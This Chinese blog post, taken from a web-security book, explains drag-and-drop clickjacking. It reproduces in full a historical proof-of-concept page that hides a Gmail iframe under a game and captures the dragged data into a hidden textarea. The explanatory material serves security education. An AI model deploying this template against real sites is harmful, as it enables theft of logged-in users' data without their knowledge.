拖拽劫持与数据窃取

最新推荐文章于 2024-06-27 23:37:00 发布
最新推荐文章于 2024-06-27 23:37:00 发布
阅读量300 收藏 3
点赞数 4
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A526847/article/details/139902257
版权

2010 年,ClickJacking 技术有了新的发展。一位名叫 Paul Stone 的安全研究者在 BlackHat 2010 大会上发表了题为“Next Generation Clickjacking”的演讲。在该演讲中,提出了“浏览器 拖拽事件”导致的一些安全问题。

目前很多浏览器都开始支持 Drag & Drop 的 API。对于用户来说,拖拽使他们的操作更加 简单。浏览器中的拖拽对象可以是一个链接,也可以是一段文字,还可以从一个窗口拖拽到另 外一个窗口,因此拖拽是不受同源策略限制的。

“拖拽劫持”的思路是诱使用户从隐藏的不可见 iframe 中“拖拽”出攻击者希望得到的数 据,然后放到攻击者能控制的另外一个页面中,从而窃取数据。

在 JavaScript 或者 Java API 的支持下,这个攻击过程会变得非常隐蔽。因为它突破了传统 ClickJacking 一些先天的局限,所以这种新型的“拖拽劫持”能够造成更大的破坏。

国内的安全研究者 xisigr 曾经构造了一个针对Gmail的POC2 ,其过程大致如下。

首先,制作一个网页小游戏,要把小球拖拽到小海豹的头顶上。

实际上,在小球和小海豹的头顶上都有隐藏的 iframe。

在这个例子中,xisigr 使用 event.dataTransfer.getData('Text') 来获取“drag”到的数据。当 用户拖拽小球时,实际上是选中了隐藏的 iframe 里的数据;在放下小球时,把数据也放在了隐 藏的 textarea 中,从而完成一次数据窃取的过程。

这个例子的源代码如下:

<html> 
 
 <head> 
 <title> 
 Gmail Clickjacking with drag and drop Attack Demo 
 </title> 
 <style> 
 .iframe_hidden{height: 50px; width: 50px; top:360px; left:365px; overflow:hidden; 
 filter: alpha(opacity=0); opacity:.0; position: absolute; } .text_area_hidden{ 
 height: 30px; width: 30px; top:160px; left:670px; overflow:hidden; filter: 
 alpha(opacity=0); opacity:.0; position: absolute; } .ball{ top:350px; left:350px; 
 position: absolute; } .ball_1{ top:136px; left:640px; filter: alpha(opacity=0); 
 opacity:.0; position: absolute; }.Dolphin{ top:150px; left:600px; position: 
 absolute; }.center{ margin-right: auto;margin-left: auto; 
vertical-align:middle;text-align:center; 
 margin-top:350px;} 
 </style> 
 <script> 
 function Init() { 
 var source = document.getElementById("source"); 
 var target = document.getElementById("target"); 
 if (source.addEventListener) { 
 target.addEventListener("drop", DumpInfo, false); 
 } else { 
 target.attachEvent("ondrop", DumpInfo); 
 } 
 } 
function DumpInfo(event) { 
 showHide_ball.call(this); 
 showHide_ball_1.call(this); 
 var info = document.getElementById("info"); 
 info.innerHTML += "<span style='color:#3355cc;font-size:13px'>" + 
event.dataTransfer.getData('Text') + "</span><br> "; 
 } 
 function showHide_frame() { 
 var iframe_1 = document.getElementById("iframe_1"); 
 iframe_1.style.opacity = this.checked ? "0.5": "0"; 
 iframe_1.style.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=" + 
(this.checked ? "50": "0") + ");" 
 } 
 function showHide_text() { 
 var text_1 = document.getElementById("target"); 
 text_1.style.opacity = this.checked ? "0.5": "0"; 
 text_1.style.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=" + 
(this.checked ? "50": "0") + ");" 
 } 
 function showHide_ball() { 
 var hide_ball = document.getElementById("hide_ball"); 
 hide_ball.style.opacity = "0"; 
 hide_ball.style.filter = "alpha(opacity=0)"; 
 } 
 function showHide_ball_1() { 
 var hide_ball_1 = document.getElementById("hide_ball_1"); 
 hide_ball_1.style.opacity = "1"; 
 hide_ball_1.style.filter = "alpha(opacity=100)"; 
 } 
 function reload_text() { 
 document.getElementById("target").value = ''; 
 } 
 </script> 
 </head> 
 
 <body onload="Init();"> 
 <center> 
 <h1> 
 Gmail Clickjacking with drag and drop Attack 
 </h1> 
 </center> 
 <img id="hide_ball" src=ball.png class="ball"> 
 <div id="source"> 
 <iframe id="iframe_1" src="https://mail.google.com/mail/ig/mailmax" 
class="iframe_hidden" 
 scrolling="no"> 
 </iframe> 
 </div> 
 <img src=Dolphin.jpg class="Dolphin"> 
 <div> 
 <img id="hide_ball_1" src=ball.png class="ball_1"> 
 </div> 
 <div> 
 <textarea id="target" class="text_area_hidden"> 
 </textarea> 
 </div> 
 <div id="info" style="position:absolute;background-color:#e0e0e0;font-weight:bold; 
top:600px;"> 
 </div> 
 <center>
Note: Clicking "ctrl + a" to select the ball, then drag it to the 
 <br> 
 mouth of the dolphin with the mouse.Make sure you have logged into GMAIL. 
 <br> 
 </center> 
 <br> 
 <br> 
 <div class="center"> 
 <center> 
 <center> 
 <input id="showHide_frame" type="checkbox" 
onclick="showHide_frame.call(this);" 
 /> 
 <label for="showHide_frame"> 
 Show the jacked I--Frame 
 </label> 
 | 
 <input id="showHide_text" type="checkbox" onclick="showHide_text.call(this);" 
 /> 
 <label for="showHide_text"> 
 Show the jacked Textarea 
 </label> 
 | 
 <input type=button value="Replay" onclick="location.reload();reload_text();"> 
 </center> 
 <br><br> 
 <b> 
 Design by 
 <a target="_blank" href="http://hi.baidu.com/xisigr"> 
 xisigr 
 </a> 
 </b> 
 </center> 
 </div> 
 </body> 
</html>

 这是一个非常精彩的案例。

注:本文来自白帽子讲web安全。

亿林数据
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
excel数据的输入与编辑.ppt
11-15
在Excel中,数据的输入与编辑是日常工作中非常基础且重要的技能。本节主要涵盖了Excel电子表格中的数据类型、对齐方式以及数据的输入方法,包括自动填充功能和一些实用技巧。 首先,Excel中的数据类型主要有三种:...
Excel办公中的数据分析与处理完整版资料.ppt
11-19
6. **数据透视分析**:数据透视表是分析大量数据的强大工具,可以快速生成汇总和交叉列表,通过拖拽字段进行多维度分析。数据透视图则将这些分析结果以图表形式呈现。 7. **数据图表制作**:Excel支持多种图表类型...
拖拽式操作数据挖掘网站
05-01
拖拽数据挖掘网站 前后端分离 前端:Vue、Antv X6 后端:Django 干货满满
PHP+Mysql+FullCalendar日历拖动与数据保存
08-30
PHP+Mysql+FullCalendar日历拖动与数据保存
QTableWidget数据拖动
12-12
代码可以直接使用,要进行的操作直接在注释的操作部分写即可,主要是用来处理tableWidget中数据拖动到不同地方,只是一个简单例子,具体操作自己修改。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 167
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
WEB攻防【5】——JS项目/Node.js框架安全/识别审计/验证绕过
weixin_42090431的博客
06-27 86
JS开发的WEB应用和PHP、java.NET等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。网站检查网络下面加载了哪些js文件、以及js文件里面有没有嵌套别的js文件。一般有/static/js/app.j8 等顺序的js文件。2、开发框架-Vulhub-Node.JS安全。3、真实应用-APP应用直接重置密码。4、真实应用-违法彩彩文件上传安全。1、原生JS&开发框架-安全条件。4、如何获取更多的Js文件?2、流行的Js框架有那些?3、如何判定Js开发应用?5、如何快速获取价值代码?
VUE项目安全漏洞扫描和修复
qq_33225414的博客
06-27 119
它是通过分析 package-lock.json 文件,继而扫描我们的包分析是否包含漏洞的。3、npm audit命令将项目中配置的依赖项的描述提交到默认注册中心,并要求提供已知漏洞的报告。如果发现任何漏洞,则将计算影响和适当的补救措施。1、npm audit是npm 6 新增的一个命令,可以允许开发人员分析复杂的代码并查明特定的漏洞。4、启动服务,不出意外的话,vue.config.js 的配置会有报错。1.扫描你的项目的漏洞,只显示细节,不修复任何东西。如果没有发现漏洞,该命令将以0退出。
自主可控的芯片设计供应链软件:保障芯片产业安全的关键
YouyuanXway的博客
06-27 251
在当前的科技浪潮中,芯片作为信息技术的核心,其设计、制造和供应链的安全性和自主可控性显得尤为重要。而自主可控的芯片设计供应链软件,正是保障这一产业链安全的关键环节。
Java中的加密与解密:实现安全数据传输
java666668888的博客
06-23 431
大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!在当今信息安全至关重要的时代,保护数据安全性是每个开发人员都需要关注的重要议题。本文将深入探讨Java中的加密与解密技术,帮助你实现安全数据传输。
安全】使用Fanotify拦截文件操作
追寻梦想的青春
06-21 461
前文已经说过,Fanotify相比Inotify,比较大的优势是获取的数据多以及Fanotify的阻断能力。阻断能力,顾名思义,就是在用户操作文件时,如果判断出文件是有问题的,可以不让用户操作。
访问外网的安全保障——反向沙箱
Canon_YK的博客
06-21 315
目前许多安全厂家因为使用的需求,进而研制出反向沙盒,其中深信达SPN(Sandbox Proxy Network)安全上网解决方案,是直接把终端传统外网物理断开,然后在内网中部署一个沙盒安全上网网关主机,在需要访问外网的终端上安装一个沙盒,当需要访问互联网的时候,在这个隔离沙盒内访问互联网。然而,需要注意的是,虽然反向沙箱为我们提供了强大的网络安全防护能力,但它并非万能的解决方案。由此可见,反向沙箱的运行逻辑是和正常的沙箱是相反的,只能通过沙盒的安全空间以及网关上的设置使得上外网只能通过改途径。
G7易流赋能化工物流,实现安全、环保与效率的共赢
m0_67717291的博客
06-21 699
得益于G7易流平台400万+货车的真实轨迹和风险事件数据,我们发现不同行业的风险场景和事故水平是有极大区别的,危化行业56%的事故是侧翻,30%的高危司机造成了70%的事故发生,通过“AI驱动下的安全管理4层控制塔”整体安全体系建设和“三晒两抓”的安全管理方法闭环,能有效帮助化工企业实现良好的安全管理。自有车辆作为重资产,日常管理涉及到每辆车的证照、资质、保险等等,财运通系统可以把车辆信息全部记录上,并且支持照片上传,随时查看,证照、保险到期之前都会自动提醒,从根源上杜绝了证照、保险逾期的风险。
专业软件测试公司分享:安全测评对于软件产品的重要性
卓码测评
06-26 239
在互联网普及的今天,随着各类软件的大规模使用,安全问题也变得愈发突出。因此,对软件进行全面的安全测评,不仅可以有效保障用户的信息安全,还能提升软件产品的信任度和市场竞争力。
强化安全新篇章:韶关石油化工可燃气体报警器年检解析
BDjiance的博客
06-21 437
它主要用于检测空气中的可燃气体浓度,一旦浓度超过预设的安全阈值,报警器便会立即发出声光警报,提醒操作人员及时采取应对措施,从而有效防止火灾或爆炸事故的发生。通过加强年检和日常安全管理工作,可以确保这些报警器始终处于良好的工作状态,为企业的安全生产提供有力的保障。对于韶关的石油化工企业来说,可燃气体报警器的年检不仅是一项法定要求,更是保障企业安全生产的必要措施。然而,随着石化产业的快速发展,如何确保生产过程中的安全,成为了摆在韶关面前的重要课题。
餐饮冷库安全守护神:可燃气体报警器检定的科学性与有效性
BDjiance的博客
06-27 150
随着餐饮业的快速发展,冷库成为储存食材、保证食品质量的重要场所。然而,由于冷库环境的特殊性,如密封性强、温度低、湿度大等,一旦冷库内发生可燃气体泄露,后果将不堪设想。因此,在餐饮冷库中安装并合理使用可燃气体报警器,以及定期对其进行检定,显得尤为重要。接下来,佰德将探讨可燃气体报警器在餐饮冷库中的应用,以及检定的必要性和内容。
Ilya出走记:SSI的超级安全革命
zixiangxian的博客
06-21 1543
那么问题来了,大部分人做不到。是的,可能大部分公司都是OpenAI而非SSI。那么除了大模型公司在内部致力于构建一个安全、可信的大模型之外,这两年随着技术和应用的发展,社会各界也对AI和大模型的安全作出了许多努力。2021年11月,联合国教科文组织就曾通过《人工智能伦理问题建议书》,希望为人工智能的发展,以及预防其潜在风险提供建议。今年3月份,联合国教科文组织总干事奥德蕾·阿祖莱还在公开呼吁,希望各国尽快实施这项建议,为人工智能发展设立伦理标准。
安全与加密常识(5)自签名证书
最新发布
二进制君
06-27 518
自签名证书是由不受信的CA机构颁发的数字证书,也就是自己签发的证书。与受信任的CA签发的传统数字证书不同,自签名证书是由一些公司或软件开发商创建、颁发和签名的。虽然自签名证书使用的是与X.509证书相同的加密密钥对架构,但是却缺少受信任第三方的验证。在颁发过程中缺乏独立验证会产生额外的风险,这就是为什么对于面向公众的网站和应用程序来说,自签名证书是不安全的。
加密与安全_ Jasypt (Java Simplified Encryption)不完全指北
小工匠
06-27 198
Jasypt 是一个 Java 库,它允许开发人员以最小的努力添加基本的加密功能,并且不需要深入了解密码学的工作原理。高安全性、基于标准的加密技术,适用于单向和双向加密。加密密码、文本、数字、二进制文件…与 Hibernate 的透明集成适合集成到基于 Spring 的应用程序中,也可以与 Spring Security 透明集成用于加密应用程序配置(即数据源)的集成功能多处理器/多核系统中高性能加密的特定功能开放 API,可与任何 JCE 提供商一起使用。
Origin数据处理与科学作图完美版资料.ppt
12-01
Origin 8是一款功能强大的数据处理与科学作图软件,旨在帮助用户快速、准确地分析和展示数据。Origin 8拥有丰富的数据处理功能,包括数据导入、清洗、转换、统计分析等,同时还提供了各种图表工具,可以绘制多种类型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值